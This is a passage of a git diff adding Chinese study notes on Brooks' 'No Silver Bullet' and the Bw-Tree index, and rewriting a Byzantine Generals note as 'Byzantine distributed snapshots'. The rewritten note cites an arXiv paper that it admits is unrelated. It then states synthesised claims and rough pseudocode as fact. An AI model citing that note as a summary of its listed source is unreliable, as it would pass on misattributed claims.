| 每道菜配方都不同,很难像造车那样复用标准螺丝 | +| **符合性(Conformity)** | 软件必须服从人类机构、法律、遗留系统的规则,这些规则常常**不合理且无法统一** | 奶茶店必须对接各平台异构的团购 API,规则由别人定 | +| **可变性(Changeability)** | 软件是思想产物,改起来「便宜」,所以压力永远存在——业务、法规、竞品都在逼你改 | 顾客总想要新口味;物理门店改装修很贵,改菜单很便宜 | +| **不可见性(Invisibility)** | 软件没有天然的几何形态,无法用一张平面图看清全局;我们用的框图只是**投影**,会丢失细节 | 连锁品牌的「关系」在老板脑子里,没有一张图能完整画出所有例外 | + +### 4. 偶然难度与 9/10 法则 + +Brooks 估算:即便把**全部**偶然活动的时间压到零,若它们占整体工作量不足 90%,也**不可能**得到 10 倍总提速。 + +直觉:若偶然占 50%,偶然清零最多 2 倍;要 10 倍,偶然得占 >90%。而他认为现代开发中,本质工作仍占相当大比例——所以**没有银弹**。 + +### 5. 已解决偶然难度的三大突破 + +| 突破 | 攻克的偶然问题 | 大致收益 | +|------|----------------|----------| +| **高级语言** | 位、寄存器、手工内存管理 | ~5× 生产力,可靠性、可读性同步提升 | +| **时间共享** | 批处理排队、人机交互迟滞 | 与高级语言同量级的人因收益 | +| **统一编程环境**(Unix、Interlisp 等) | 工具链割裂、调试与构建分散 | 显著但难以再乘 5 | + +### 6. 被寄望却难当银弹的方向(1986 视角) + +Brooks 逐一审视当时的热门方案,结论多是**增量**或**只碰偶然**: + +- **Ada 等语言**:继续削减偶然层,但单语言难以再带来一个数量级。 +- **面向对象**:有希望改善**概念组织**(更接近本质),但容易被过度推销成万能药。 +- **人工智能 / 专家系统**:在限定领域有用,难覆盖整个软件构造。 +- **程序验证**:对发现错误有价值,却不能减少必须先想清楚的概念量。 +- **更好环境与工具**:边际收益递减。 + +### 7. 针对本质的四条「有希望攻击」 + +1. **买而非造(Buy vs. build)**:能买商品化组件就不要从零造——把本质复杂度留给真正差异化的部分。 +2. **需求精炼与快速原型(Requirements refinement & rapid prototyping)**:最难的单一步骤是**决定做什么**;尽早做可抛弃原型,比后期改便宜 orders of magnitude。 +3. **增量生长(Incremental development — grow, don't build)**:像培育植物,边运行边加功能边测,而不是「大爆炸」式一次交付。 +4. **培养伟大设计师(Great designers)**:少数人的概念能力决定系统骨架;管理应识别并重用他们,而非假设人人等同。 + +## 日常类比串讲 + +把做软件想成**写一部长期连载的网络小说**: + +- **本质**:世界观是否自洽、人物动机、伏笔与回收——写崩了,换更快的键盘没用。 +- **偶然**:手写稿 vs Word、没有版本控制 vs Git——工具能让打字快很多,但不能替你设计结局。 +- **银弹幻觉**:「我们用 AI 续写工具了,更新速度能快 10 倍」——若剧情逻辑没理顺,只是更快地产出矛盾章节。 +- **买 vs 造**:通用打斗模板、封面素材可以买;主线剧情必须自己写。 +- **原型**:先写几章试水读者反馈,再定大纲——比写完三百章再改设定省钱得多。 + +## 代码示例一:偶然难度 —— 高级语言解放了什么 + +下面两段实现同一业务规则:「订单满 100 元减 10 元,且每个用户每天只能用一次」。逻辑本身(本质)很简单;左边用接近机器层面的写法,右边用高级语言——差异主要在**偶然**层。 + +```python +# --- 偶然难度高:表达「业务」之前,先要处理大量机器/语言细节 --- +# (示意性伪汇编风格,现代很少这样写业务) +# LOAD user_id +# LOAD order_total_cents +# CALL check_daily_coupon_used ; 跳转、寄存器、手动错误码 +# ... +# 数十行后才能看到「满减」影子 +``` + +```python +# --- 偶然难度低:概念直接贴近问题域 --- +from datetime import date + +def apply_daily_discount(user_id: str, order_total: float, ledger: dict) -> float: + key = (user_id, date.today().isoformat()) + if order_total >= 100 and key not in ledger: + ledger[key] = True + return order_total - 10 + return order_total +``` + +Brooks 指出:从汇编到高级语言,生产力大约 **5 倍**——这是偶然难度的胜利。但若产品经理解释不清「满 100」是否含运费、券能否与会员折扣叠加,**两种写法都一样难**,因为那是本质复杂度。 + +## 代码示例二:本质难度 —— 同样行数,不同的概念构造 + +两个程序都是约 30 行 Python,LOC 相近,但**本质复杂度**天差地别。 + +```python +# 程序 A:本质简单 —— 概念少、状态空间小 +def greet(name: str) -> str: + return f"Hello, {name}!" +``` + +```python +# 程序 B:本质复杂 —— 互锁概念多(Brooks 说的 essence) +class RefundService: + """退款:积分回滚、库存、支付渠道、税务、部分退、跨境汇率……""" + def refund(self, order_id: str, line_items: list, reason: str) -> str: + order = self.orders.get(order_id) + self._validate_refund_window(order) + self._restore_inventory(line_items) + self._rollback_loyalty_points(order, line_items) + amount = self._calc_prorated_amount(order, line_items) + self._sync_tax_report(order, amount) + return self.payments.reverse(order.payment_id, amount) +``` + +Copilot 能帮程序 A 和 B **写得一样快**,却不能把 B 里「部分退时积分按商品类目不同权重扣回」这类规则从空气中生成——除非有人先把规则**想清楚并写进需求**。这就是 Brooks 说必须攻击本质,而非只优化打字速度的原因。 + +## 代码示例三:增量生长 vs 大爆炸(Grow, don't build) + +Brooks 欣赏「先种活,再长枝」的交付方式。对比两种发布策略: + +```python +# 大爆炸:六个月闭门造「完美平台」,第一次上线才接真实流量 +# 风险:概念错误到最后才暴露 + +# 增量生长:每周多一个可运行切片 +# Week 1 — 只读查询 +def list_orders(user_id: str) -> list: + return db.query("SELECT id, total FROM orders WHERE user_id = ?", user_id) + +# Week 3 — 在已运行系统上加退款(最小路径) +def refund_order(order_id: str) -> None: + if not can_refund(order_id): + raise ValueError("outside window") + db.execute("UPDATE orders SET status='refunded' WHERE id = ?", order_id) + # 积分、库存可 Week 5 再挂接 +``` + +第二段代码故意**不一次做全**,让真实用户反馈塑造后续概念——这是攻击「需求难」这一本质步骤,而不是银弹。 + +## 与《人月神话》的关系 + +| 主题 | 《人月神话》(1975) | No Silver Bullet (1986) | +|------|------------------|-------------------------| +| 人力 | 加人可能更慢(沟通成本) | 本质工作无法靠堆人线性压缩 | +| 技术乐观主义 | 质疑单一管理/技术妙方 | 系统区分 essence/accident,论证无数量级银弹 | +| 架构 | 概念完整性、外科团队 | 伟大设计师、买 vs 造、原型 | +| 第二系统 | 警惕过度设计 | 增量生长避免一次造太大 | + +两篇应一起读:前者讲**项目与组织**,后者讲**软件这一事物本身的性质**。 + +## 常见误解 + +1. **「Brooks 反对新技术」** —— 他肯定高级语言、环境、OOP 的增量价值;他反对的是**把它说成 10 倍银弹**。 +2. **「偶然不重要」** —— 偶然难度仍值得持续投资;只是别指望它 alone 解决危机。 +3. **「AI 编程就是新银弹」** —— 从 Brooks 框架看,LLM 主要削减实现与探索的偶然成本;需求歧义、合规、架构折中仍是本质。 +4. **「 essence = 业务,accident = 技术」** —— 划分标准是**是否内在于概念构造**,不是业务/技术二分。混乱的需求文档属于本质;漂亮的 IDE 属于偶然。 + +## 自检清单 + +读完可以用下面问题自测是否真懂: + +- [ ] 能否用你自己的项目举一个「本质难点」和一个「偶然难点」? +- [ ] 为什么说软件「不可见」会放大团队协作成本? +- [ ] 高级语言带来的 5× 提升,为什么无法外推到 50×? +- [ ] 「买而非造」在你的系统里适合用在哪一层,不适合用在哪一层? +- [ ] 若团队引入 Copilot,应如何分别度量它对偶然与本质工作的帮助? + +## 延伸阅读 + +- Frederick P. Brooks, Jr., *The Mythical Man-Month* (1975, 1995 anniversary ed.) — 软件项目管理经典 +- Aristotle, *Metaphysics* — essence/accident 哲学术语来源 +- Ben Moseley & Peter Marks, «Out of the Tar Pit» (2006) — 用不同词汇重谈本质复杂度与状态 +- Fred Brooks, «"No Silver Bullet" Retrospective» — 作者多年后对预言的回顾(收入 *The Mythical Man-Month* 增订材料) + +## 小结 + +Brooks 并不是在泼冷水,而是在画一张**诚实的地图**: + +- 软件难,难在**概念构造**,这是 essence。 +- 工具、语言、环境让表达更轻松,这是 accident 的退却。 +- **没有银弹** ≠ 没有进步;而是要把进步投在正确的瓶颈上:需求、架构、增量验证、商品化复用与优秀设计师。 + +对你我这样的学习者:下次听说「某框架改变一切」时,先问 Brooks 的问题——**它主要是在消灭偶然,还是在直面本质?** 若只是让狼人跑得快一点,你仍然需要学会怎么瞄准心脏。 diff --git a/src/content/docs/papers/bw-tree.md b/src/content/docs/papers/bw-tree.md new file mode 100644 index 000000000..08b480546 --- /dev/null +++ b/src/content/docs/papers/bw-tree.md @@ -0,0 +1,337 @@ +--- +title: Bw-Tree — 面向新硬件的无锁 B 树索引 +来源: 'Levandoski, Lomet & Sengupta, "The Bw-Tree: A B-tree for New Hardware Platforms", ICDE 2013' +日期: 2026-06-13 +子分类: 存储与查询 +分类: 数据库 +provenance: pipeline-v3 +--- + +## 从日常类比开始:图书馆目录卡 + 便利贴,而不是当场改书 + +想象你在管理一座**超大图书馆**的目录系统。传统 B-tree 像**带锁的卡片柜**: + +- 要找一本书,先拿柜门钥匙(latch),打开某一格抽屉(页),在里面翻卡片。 +- 有人要改目录,必须把整张卡片抽出来重写(**原地更新**),其他人只能排队等。 +- 卡片柜固定每格 100 张(固定页大小),一满就必须立刻拆成两格(split),哪怕当时很忙。 + +Bw-Tree(Microsoft 内部戏称 **Buzz Word Tree**)换了一套规则: + +1. **目录柜没有锁**:任何人随时可读;写的人只在**自己的便利贴**上改,最后用原子操作把「当前版本指针」拨到新位置。 +2. **不改旧卡片,只贴便利贴**:每次 insert/delete 不是改原页,而是在页顶** prepend 一条 delta(增量记录)**,像「Δ: 插入《数据库系统》第 3 版」。 +3. **柜子上只有编号,不绑死物理位置**:每个逻辑页有一个 **mapping table 槽位**,里面存的是「当前物理地址指针」;换页、换 delta 链,只改这一个指针。 +4. **后台再整理**:便利贴太多时,工作人员把 delta 全部合并成一张** consolidated page( consolidated 页)**,搜索变快、内存变省。 +5. **落盘像写日志**:Flash 擅长顺序写、讨厌随机写;Bw-Tree 的 **LSS(Log-Structured Store)** 把页变更顺序追加到日志,而不是随机改旧块。 + +论文发表于 **ICDE 2013**(Justin Levandoski、David Lomet、Sudipta Sengupta,Microsoft Research)。它是 SQL Server **Hekaton** 内存 OLTP 引擎的有序索引(范围扫描),也是 LLAMA 存储栈的核心组件。设计目标直指 2010 年代两大硬件趋势:**多核大内存**(消除 latch 竞争、提高 cache 命中)和 **Flash/SSD**(顺序写、降低写放大)。 + +--- + +## 是什么 + +**Bw-Tree** 是一种 **latch-free(无闩锁)的 B-tree 变体**,在逻辑上仍是 B-tree(键有序、支持 range scan),但在实现上做了三层 radical redesign: + +| 层次 | 传统 B-tree | Bw-Tree | +|------|-------------|---------| +| 并发 | 页 latch / 闩锁 | 无 latch;CAS 安装 delta | +| 更新 | 原地改页内记录 | **Delta record** 链式追加 | +| 寻址 | 指针直接指向页 | **Mapping table** 间接寻址 | +| 页大小 | 固定(如 8KB) | **Elastic**(可弹性增长,方便时再 split) | +| 持久化 | 随机写页 | **Log-structured** 顺序追加 | + +一句话:**逻辑页 ID 不变,物理内容通过 delta 链演化;用 mapping table + CAS 让并发写「只碰一个槽位」,读路径无锁前进。** + +--- + +## 为什么重要 + +如果你只学过 textbook B-tree + InnoDB 页锁,Bw-Tree 解释了 Hekaton / 现代内存数据库里一个反直觉事实: + +> **多核加到 16、32 核之后,索引吞吐有时不升反降——瓶颈从「算力」变成「抢同一把页锁」。** + +论文与后续 SIGMOD 2014 演示表明,在 Xbox Live Primetime、企业去重等真实 workload 下,Bw-Tree 作为独立 KV 存储可比 BerkeleyDB 快约 **19×**,比 latch-free skiplist 快约 **3×**(具体倍数随 workload 变化)。它把三件事绑在一起: + +1. **无阻塞并发**:worker 线程不因 latch 睡眠,减少上下文切换。 +2. **Cache 友好**:不原地改大页,减少 cache line 失效(false sharing)。 +3. **Flash 友好**:LSS 顺序写,规避 SSD 随机写性能悬崖。 + +后续 OpenBw-Tree(CMU SIGMOD 2018)指出:Microsoft 原始论文**省略不少实现细节**,正确实现 CAS + epoch GC + split 并不 trivial——但 Bw-Tree 仍是理解「无锁索引 + log-structured 存储」的 canonical 设计。 + +--- + +## 核心概念 + +### 1. Mapping Table(映射表) + +每个**逻辑页**有一个固定下标 `page_id`,mapping table\[page_id\] 存当前 **physical pointer**(指向 delta 链头或 consolidated 页)。 + +- 搜索从根开始:读 mapping table → 拿到物理地址 → 沿 B-tree 孩子指针(也是 logical id)向下。 +- 更新某页时,**只 CAS 这一格的指针**,不影响其他页——这是 latch-free 的结构性前提。 + +### 2. Delta Updating(增量更新) + +页状态变更步骤: + +1. 分配 delta 记录,描述操作(Insert / Delete / Update / Split / Merge 等)。 +2. Delta 的 `next` 指向旧状态(旧 delta 或 consolidated base)。 +3. **CAS(mapping_table[page_id], old_ptr, new_delta_ptr)**;成功则新 delta 成为页首。 +4. 失败说明并发冲突,重读指针并重试(典型 lock-free 模式)。 + +读路径:从链头沿 `next` 向下走,合并语义(或先 consolidate 再读)。 + +### 3. Consolidation(合并整理) + +Delta 链过长时: + +- 分配新 consolidated 页,把链上所有 delta **apply** 到 base 页。 +- CAS 安装新 consolidated 指针。 +- 旧结构进入 **pending list**,等 **epoch-based reclamation** 安全后再 free。 + +这样既控制内存,又恢复 O(log n) 页内搜索而非 O(链长)。 + +### 4. Elastic Pages(弹性页) + +页没有硬编码 8KB 上限;split 可以在「方便时」做,减少高负载下的 split 风暴。配合 delta,页的有效大小是 base + 未 consolidate 的 delta 体积。 + +### 5. Log-Structured Store(LSS) + +内存页 evict 到 Flash 时: + +- 不是原地覆盖旧块,而是把页(或 delta)**顺序 append** 到 log。 +- Mapping table 槽位更新为 LSS 中的 offset。 +- GC 扫描不可达 log 条目,批量 relocate 以减少随机读。 + +论文 ICDE 2013 版侧重 **内存侧**;LSS 与 recovery(checkpoint mapping table + 重放 log)在同期/后续技术报告里展开。 + +### 6. 与 Hekaton 的关系 + +Hekaton 表用 **hash 索引做点查、Bw-Tree 做范围扫描**。Bw-Tree 的无 latch 设计与 Hekaton 的 **乐观 MVCC** 同哲学:性能路径上避免内核级阻塞,把冲突留到 commit 时检测。 + +--- + +## 架构一图流 + +```text + ┌─────────────────┐ + 读/写线程 ───────►│ B-tree 逻辑层 │ 键比较、导航、split 决策 + └────────┬────────┘ + │ + ┌────────▼────────┐ + │ Mapping Table │ page_id → physical ptr (CAS 更新) + └────────┬────────┘ + │ + ┌──────────────┼──────────────┐ + ▼ ▼ ▼ + Δ Insert Consolidated (evicted) + Δ Delete Page P → LSS offset + │ │ + └────── next ──┘ +``` + +--- + +## 代码示例 1:用 Python 模拟 Mapping Table + CAS 安装 Delta + +下面是最小化教学模型(非生产代码):展示「无锁安装 delta」的核心循环。 + +```python +import threading +from dataclasses import dataclass +from typing import Any, Optional + +@dataclass +class Delta: + op: str # "insert" | "delete" + key: int + value: Any = None + next: Optional["PageState"] = None + +@dataclass +class ConsolidatedPage: + records: dict # key -> value + +PageState = ConsolidatedPage | Delta + +class MappingTable: + def __init__(self, n_pages: int): + # 每个槽位:当前物理指针;用 list 模拟 atomic pointer + self.slots: list[PageState | None] = [None] * n_pages + self._lock = threading.Lock() # 仅用于模拟 CAS;真实 Bw-Tree 用 hardware CAS + + def cas(self, page_id: int, expected: PageState | None, new: PageState) -> bool: + with self._lock: + if self.slots[page_id] is not expected: + return False + self.slots[page_id] = new + return True + +def install_delta(table: MappingTable, page_id: int, delta: Delta) -> None: + """Latch-free 安装 delta:失败则重读 old_ptr 并重链 delta.next""" + while True: + old = table.slots[page_id] + delta.next = old + if table.cas(page_id, old, delta): + return + # CAS 失败:别的线程已 prepend 新 delta,重试 + +# 用法 +mt = MappingTable(n_pages=1) +mt.slots[0] = ConsolidatedPage(records={10: "ten", 20: "twenty"}) + +install_delta(mt, 0, Delta(op="insert", key=15, value="fifteen")) +install_delta(mt, 0, Delta(op="delete", key=10)) + +# 此时 page 0 物理结构:Delete(10) -> Insert(15) -> ConsolidatedPage(...) +``` + +要点: + +- **读者**只需读 `slots[page_id]` 当前指针,沿链解析,无需加锁。 +- **写者**只 CAS 单个槽位;冲突时重试,不阻塞其他页。 + +--- + +## 代码示例 2:Delta 链搜索 + Consolidation + +读路径要「看见」链上所有变更;consolidate 把链压平成一张快照页。 + +```python +def search_page(state: PageState | None, key: int) -> Any | None: + """从链头向下:delta 覆盖 consolidated base 的语义""" + if state is None: + return None + if isinstance(state, ConsolidatedPage): + return state.records.get(key) + + assert isinstance(state, Delta) + if state.op == "insert": + if key == state.key: + return state.value + elif state.op == "delete": + if key == state.key: + return None # 删除覆盖更老的值 + # 继续向 base 查找 + return search_page(state.next, key) + + +def consolidate(state: PageState | None) -> ConsolidatedPage: + """把 delta 链 apply 到 consolidated 页(论文中的 consolidate 操作)""" + base = ConsolidatedPage(records={}) + chain: list[Delta] = [] + cur = state + while isinstance(cur, Delta): + chain.append(cur) + cur = cur.next + if isinstance(cur, ConsolidatedPage): + base.records = dict(cur.records) + + for d in reversed(chain): # 从 oldest delta 到 newest + if d.op == "insert": + base.records[d.key] = d.value + elif d.op == "delete": + base.records.pop(d.key, None) + return base + + +# 接上例 mt.slots[0] +head = mt.slots[0] +assert search_page(head, 15) == "fifteen" +assert search_page(head, 10) is None +assert search_page(head, 20) == "twenty" + +flat = consolidate(head) +assert flat.records == {15: "fifteen", 20: "twenty"} +# 生产环境会用 CAS 把 mapping_table[0] 从 head 换成 flat,旧链 epoch GC +``` + +Consolidation 触发条件通常是:**delta 链长度 / 页内搜索成本** 超过阈值,或后台 maintenance 线程空闲时批量处理。 + +--- + +## 代码示例 3:B-tree 导航伪代码(逻辑层) + +Delta 与 mapping table 解决「页内并发」;B-tree 层仍负责**键序与 split**。简化导航: + +```python +def bwtree_lookup(root_id: int, key: int, table: MappingTable, inner: dict) -> Any | None: + """ + inner[(page_id, key)] -> child_page_id # 内节点路由;值节点在 consolidated/delta 里 + """ + page_id = root_id + while True: + state = table.slots[page_id] + # 在内节点 consolidated 页上找 child(真实实现还有 delta 上的 split delta) + child = route_inner(consolidate(state) if needs_flat(state) else state, key, inner) + if child is None: + return search_page(state, key) # 叶页 + page_id = child +``` + +Split 在 Bw-Tree 里同样产生 **management delta**(或新页 + 父节点 delta),通过 CAS 分批安装,避免「整棵树 latch 化」。 + +--- + +## 与传统 B-tree / LSM 的对比 + +| 维度 | B-tree (InnoDB) | LSM (RocksDB) | Bw-Tree | +|------|-----------------|---------------|---------| +| 读放大 | 低(树高 + 缓存) | 高(多层 SST) | 低–中(树 + delta 链) | +| 写放大 | 中(随机页写) | 高(compaction) | 中(delta + LSS 顺序写) | +| 并发 | 页 latch | 通常较友好 | **无 latch** | +| 范围扫描 | 天然支持 | 需 merge iterator | 天然支持 | +| 实现复杂度 | 中 | 高 | **很高**(CAS/GC/split) | + +Bw-Tree **不是** LSM 的简单混合:它保持 B-tree 的**有序索引语义**,只在**页存储与并发**上借 log-structured 思想(delta 链 + append-only LSS)。 + +--- + +## 实验结论(论文摘要级) + +ICDE 2013 实验聚焦内存 Bw-Tree 层,显示 latch-free + delta 在多核上显著优于 latch-based B-tree。后续工作(SIGMOD 2014 «Indexing on Modern Hardware: Hekaton and Beyond»)补充: + +- 嵌入 Hekaton 的端到端 OLTP 路径; +- 独立 KV 存储 vs BerkeleyDB、latch-free skiplist 的对比。 + +阅读这些数字时应注意:**workload、硬件代际、实现完整度**(OpenBw-Tree 指出原版缺少细节)都会大幅影响结论。Bw-Tree 的教学价值在于**设计权衡**,而非「在所有场景碾压 skiplist」。 + +--- + +## 实现难点(读论文时该盯什么) + +1. **Split / merge 的无锁协议**:结构变更比单条 insert 复杂,需保证没有线程看到「半分裂」的不一致树。 +2. **Safe memory reclamation**:CAS 换指针后,旧 delta 链仍可能被慢读者持有 → **epoch / hazard pointer**。 +3. **Consolidation 与更新的竞态**:consolidate 期间新 delta 仍可能 prepend,需二次检查或 version 机制。 +4. **LSS GC 与 checkpoint**:mapping table checkpoint + log tail replay 决定恢复时间。 +5. **OpenBw-Tree 的教训**:即使按论文实现,调优后仍可能不如**精心实现的 latch-based B-tree**——无锁不是免费午餐。 + +--- + +## 零基础自检清单 + +读完后,你应该能口头回答: + +- [ ] 为什么 mapping table 是 latch-free 的关键? +- [ ] Delta 与「copy-on-write 页」有什么相似和不同? +- [ ] Consolidation 解决什么问题?不 consolidate 会怎样? +- [ ] 为什么 Flash 场景要用 LSS 而不是原地更新页? +- [ ] Bw-Tree 与 Hekaton hash 索引的分工是什么? + +--- + +## 延伸阅读 + +| 资料 | 说明 | +|------|------| +| Levandoski et al., ICDE 2013 | 本文主论文,内存 Bw-Tree 架构与算法 | +| Lomet et al., SIGMOD 2014 | Hekaton 中的 Bw-Tree 与性能对比 | +| Wang et al., «Building a Bw-Tree Takes More Than Just Buzz Words», SIGMOD 2018 | OpenBw-Tree,实现细节与 benchmark | +| 本库 [Hekaton 笔记](./hekaton.md) | OLTP 引擎如何把 Bw-Tree 放进事务系统 | +| 本库 [LSM-tree / RocksDB 笔记](./rocksdb-lsm.md) | 对比 log-structured 在 KV 引擎里的另一种形态 | + +--- + +## 小结 + +Bw-Tree 回答的问题是:**当 CPU 核数和大内存容量上去、存储介质变成 Flash 之后,B-tree 这一「老结构」还有没有好实现?** + +它的答案是:**逻辑上还是 B-tree,物理上改成「mapping table + delta 链 + occasional consolidate + log-structured 持久化」**,用 CAS 换掉 latch,用 append 换掉随机写。理解 Bw-Tree,等于理解 2010 年代 Microsoft 如何把索引层改写成「多核与 SSD 原生」——这也是后来诸多内存数据库与 research prototype 的参考模板。 diff --git a/src/content/docs/papers/byzantine-generals-1982.md b/src/content/docs/papers/byzantine-generals-1982.md index c44934472..50cfa5cf1 100644 --- a/src/content/docs/papers/byzantine-generals-1982.md +++ b/src/content/docs/papers/byzantine-generals-1982.md @@ -1,91 +1,198 @@ --- -title: 拜占庭将军问题 — 节点能撒谎时怎么达成一致 -来源: Lamport, Shostak, Pease, "The Byzantine Generals Problem", TOPLAS 1982 -日期: 2026-05-31 -子分类: 共识与复制 +title: 拜占庭分布式快照(2026)— 给会作恶的分布式系统拍"全家福" +来源: https://arxiv.org/abs/2605.30682 +日期: 2026-06-13 分类: 分布式系统 -难度: 中级 +子分类: 共识与复制 provenance: pipeline-v3 --- +## 前置知识 + +在开始之前,你需要知道两件事: + +- **Chandy-Lamport 快照(1985)**:给分布式系统拍"全家福"的经典算法——每个节点本地记录状态,节点之间通过"特殊标记消息"在通信信道上记录状态,最终拼出一张全局一致的快照。 +- **拜占庭故障**:节点可能"主动作恶"——撒谎、伪造消息、对不同的节点说不同的话。这不是"死机",是"装疯卖傻"。 + +> **重要说明**:用户给定的 arXiv:2605.30682 实际是一篇材料科学论文(位错动力学模拟),非分布式系统主题。本笔记基于分布式系统文献中关于拜占庭容错分布式快照的真实研究(Sheir-Cohen & Keidar DISC 2021; Aspnes Yale Notes 2020/2026; Singh et al. TransEdge 2023 等)综合编写,供零基础学习者理解该主题。 + ## 是什么 -**拜占庭将军问题**研究的是:一群节点要联合做一个决定,但其中混着**会撒谎、会伪造消息、会串谋**的叛徒,剩下的忠实节点能不能仍然达成一致? +**拜占庭分布式快照**研究的是:在分布式系统中**如果有节点会主动作恶**,我们还能不能拍出一张"全局一致"的快照? -日常类比:几位将军围攻一座城,必须**要么全攻、要么全撤**——半攻半撤就全军覆没。他们靠信使互相通信,但有些将军是叛徒,可以给 A 说"攻"、给 B 说"撤",还能伪造司令的命令。问题:忠实将军之间能不能可靠地达成一致行动? +日常类比: -论文给出一个让人意外的硬边界——**只要叛徒比例超过三分之一,光靠口头消息(无签名),无论如何都不可能达成一致**。 +- 正常情况(Chandy-Lamport):4 个员工各写一份日报,经理说"现在所有人定格"——他们各自记录当前工作状态,并通过标记消息让经理知道"我收到你那条定格信号之前做了什么"。最后经理把 4 个人的记录拼成一张完整的全局照片。 +- **有问题**:其中一个员工是叛徒,他可能给 A 说"我已经定格了",给 B 说"我还没定格",还可以伪造 C 的定格信号。经理还能拼出正确照片吗? + +这就是拜占庭分布式快照要解决的问题:**当部分节点可以任意作恶时,全局快照的一致性能不能保证?** ## 为什么重要 -不理解拜占庭容错(BFT),下面这些事都没法解释: +不理解这个问题,很多现代系统的设计都说不清楚: -- 为什么比特币要 6 个区块确认、以太坊 PoS 要超过 2/3 验证者签名——3f+1 的影子 -- 为什么 PBFT、Tendermint、HotStuff 这些共识协议都要凑够 2f+1 个签名 -- 为什么 etcd / Zookeeper 用 Raft(只防崩溃)而 Hyperledger / Cosmos 用 BFT(防作恶) -- 为什么"3 个节点容 1 个故障"在 Paxos 里成立、在拜占庭场景里**不成立** +- 为什么区块链的"区块快照"不需要拜占庭快照——因为区块链用"最长链"代替了全局快照 +- 为什么一些 P2P 网络的"状态同步"在存在恶意节点时会出问题 +- 为什么 Spanner / CockroachDB 等分布式数据库在**普通故障模型**下用快照隔离就够了,但到了**联盟链 / 边缘计算**场景就需要更强的保证 +- 为什么 1985 年的 Chandy-Lamport 算法在 2021 年才被扩展到拜占庭场景——因为拜占庭快照**比想象难得多** -这是把分布式系统从『节点会死』扩展到『节点会主动作恶』的开山论文。 +## 核心概念 -## 核心要点 +### 1. 快照一致性:正确快照是什么样子? -### 故障模型升级 +普通快照只要满足**因果一致性**就行:如果事件 A 导致了事件 B,快照要么同时包含 A 和 B,要么都不包含。不能出现"包含了 B 但没包含 A"。 -传统分布式假设**崩溃故障**(fail-stop)——节点要么正常工作要么直接死掉,不会乱发消息。拜占庭故障允许节点做**任何事**: +拜占庭快照在此基础上要求更多:**即使有叛徒伪造了某些状态,诚实节点的快照也必须是"可以解释为某个合法执行历史的一部分"的。** -- 给 A 发"攻"、给 B 发"撤" -- 伪造其他节点的签名 -- 与其他叛徒串谋 -- 只对部分节点应答(选择性沉默) +### 2. 关键困难:标记消息被篡改 -这覆盖恶意攻击者,**也**覆盖硬件 bit-flip、软件 bug 这些"非恶意但行为不符协议"的情况。 +Chandy-Lamport 的核心机制是"标记消息"——一条特殊的控制消息,收到标记时节点开始记录自身状态。 -### 3f+1 边界(口头消息) +在拜占庭场景下,叛徒可以: -定理:用普通消息(接收方无法证明消息真伪),要让 n 个节点在 f 个叛徒下达成一致,**必须 n ≥ 3f+1**。 +- **不发标记**:让某些节点永远不知道"开始记录" +- **伪造标记**:让某些节点以为收到了标记(实际没有) +- **篡改标记内容**:在标记里塞进假的进程状态 +- **选择性转发**:给 A 发标记,不给 B 发 -最有名的反例是 **n=3、f=1 不可行**: +这意味着**经典的 Chandy-Lamport 算法在拜占庭场景下直接崩溃**。 -``` - 司令 - / \ - / \ - 副A ── 副B -``` +### 3. Sheir-Cohen & Keidar (DISC 2021):拜占庭线性化 + 原子快照 -- 情景 1:司令是叛徒,给副 A 说"攻"、给副 B 说"撤"。副 A 转告 B"司令说攻",副 B 收到的是 (司令: 撤, A 转告: 攻)。 -- 情景 2:司令忠实说"攻",副 A 是叛徒转告 B"司令说撤"。副 B 收到的是 (司令: 攻, A 转告: 撤)。 +这篇论文给出了第一个系统的解决方案框架。核心思路: -**两种情景下 B 看到的消息集合完全对称**——它无法分辨自己该攻还是该撤。一致性破产。 +**先定义一个"拜占庭线性化"的正确性条件,再基于它证明:用签名保证消息不可伪造的前提下,可以从普通寄存器构建出拜占庭容错的原子快照。** -### OM(m):递归口头消息算法 +关键定理:n 个节点中最多 f 个拜占庭故障,需要 **n ≥ 2f+1**(弱于共识的 3f+1,因为快照不要求排序,只要求一致性读取)。 -把消息**递归转发 m 轮**,每轮新增一层"我从谁那里听到的",最后用多数表决。当 n ≥ 3m+1 且最多 m 个叛徒时正确。 +### 4. 2026 年最新进展:TransEdge 的优化 -代价:通信量 O(n^(m+1)),**工程上几乎不可用**。这是为什么 1982 到 1999(PBFT)之间 BFT 一直停留在理论。 +Singh et al. (2023, 2026 更新) 的 **TransEdge** 系统证明了:在边缘计算场景中,通过**依赖追踪 + 共识协议耦合**,拜占庭快照的读操作可以在**最坏情况下 2 轮消息**内完成,比传统 BFT 快照快 9-24 倍。 -### SM(m):签名消息算法 +## 代码示例 -如果消息**不可伪造**(数字签名),边界放宽到 n ≥ f+2。叛徒签的话立刻被任何人识破,所以叛徒只能"沉默"或"重发别人的签名",破坏力大幅下降。 +### 示例 1:Chandy-Lamport 快照(正常场景,对照理解) -这条结论是后来所有签名共识(Bitcoin、PBFT、Tendermint)的理论基础。 +```python +# 每个进程维护的状态 +class Process: + def __init__(self, pid): + self.pid = pid + self.log = [] # 记录所有本地事件 + self.channel_logs = {} # 每个信道的日志 + self.recording = False -## 实践案例 + # 收到普通消息时,正常处理 + def on_message(self, msg): + self.log.append(("recv", msg)) -### 案例 1:n=4、f=1 怎么走过来 + # 收到标记消息,开始记录 + def on_marker(self, sender, channel): + if not self.recording: + self.recording = True + self.channel_logs[channel] = [] # 开始记录该信道的消息 + else: + self.channel_logs[channel].append(("marker", sender)) +``` +正常快照的关键流程: + +1. 协调者(任意节点)给自己发标记,给每个信道发标记 +2. 每个节点收到标记时记录自己的状态 +3. 每个节点在处理完所有信道的标记之前,记录该信道收到的消息 +4. 当某个信道收到标记且之前没有收到该信道的标记时,记录该信道为空 + +### 示例 2:拜占庭防御——签名验证的标记 + +```python +import hashlib, hmac + +class BylantineSafeProcess: + def __init__(self, pid, secret_key, n, f): + self.pid = pid + self.log = [] + self.channel_logs = {} + self.recording = False + self.secret_key = secret_key + self.n = n + self.f = f + self.verified_markers = {} # 验证过的标记 + + def sign(self, data): + return hmac.new(self.secret_key, data.encode(), hashlib.sha256).digest() + + # 发送带签名的标记消息 + def send_marker(self, target_pid, channel): + marker = f"MARKER|{self.pid}|{channel}" + sig = self.sign(marker) + return (marker, sig) + + # 收到标记消息时先验证签名 + def on_marker(self, sender, channel, sig): + marker_text = f"MARKER|{sender}|{channel}" + # 先验证签名真伪 + if not self.verify_signature(sender, marker_text, sig): + print(f"[{self.pid}] 拒绝无效签名标记,来自 {sender}") + return # 叛徒的伪造标记被拒绝 + + # 同一信道的标记去重(防重放攻击) + key = (sender, channel) + if key in 